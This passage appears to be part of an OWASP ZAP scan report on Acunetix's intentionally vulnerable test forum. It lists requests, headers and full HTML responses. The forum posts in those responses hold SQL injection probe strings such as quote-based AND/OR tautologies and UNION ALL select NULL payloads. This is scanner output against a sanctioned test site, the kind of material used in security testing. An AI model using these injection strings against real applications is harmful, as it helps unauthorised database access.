cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 